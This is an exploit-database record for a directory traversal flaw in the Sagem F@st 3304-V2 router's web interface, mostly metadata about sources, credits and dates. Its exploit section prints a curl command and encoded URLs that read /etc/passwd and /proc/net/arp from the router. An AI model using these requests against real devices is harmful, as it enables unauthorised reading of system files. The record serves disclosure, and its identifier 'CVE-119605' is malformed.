ID

VAR-E-201503-0451


EDB ID

36241


TITLE

Sagem F@st 3304-V2 - Local File Inclusion - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36241

DESCRIPTION

Sagem F@st 3304-V2 - Local File Inclusion. CVE-119605 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 36241

AFFECTED PRODUCTS

vendor:sagemmodel:f@stscope:eqversion:3304-v2

Trust: 1.0

vendor:sagemmodel:[email protected]scope:eqversion:3304-v2

Trust: 0.6

sources: EXPLOIT-DB: 36241 // EDBNET: 57594

EXPLOIT

# Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected)
# Date : 2015-03-01
# Author : Loudiyi Mohamed
# Contact : Loudiyi.2010@gmail.com
# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603

# Vulnerability description:
Sagem Fast is an ADSL Router using a web management interface in order to change configuration
settings. The router is Sagem Fast is an ADSL Router using a web management interface in order
to change configuration settings.
The web server of the router is vulnerable to directory traversal which allows reading files
by sending encoded '../' requests.

The vulnerability may be tested with the following command-line:
curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd
Or directly from navigateur:
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp

Trust: 1.0

sources: EXPLOIT-DB: 36241

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 36241

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36241

TYPE

Local File Inclusion

Trust: 1.0

sources: EXPLOIT-DB: 36241

CREDITS

Loudiyi Mohamed

Trust: 0.6

sources: EXPLOIT-DB: 36241

EXTERNAL IDS

db:EXPLOIT-DBid:36241

Trust: 1.6

db:EDBNETid:57594

Trust: 0.6

sources: EXPLOIT-DB: 36241 // EDBNET: 57594

REFERENCES

url:https://www.exploit-db.com/exploits/36241/

Trust: 0.6

sources: EDBNET: 57594

SOURCES

db:EXPLOIT-DBid:36241
db:EDBNETid:57594

LAST UPDATE DATE

2022-07-27T09:24:36.728000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:36241date:2015-03-03T00:00:00
db:EDBNETid:57594date:2015-03-03T00:00:00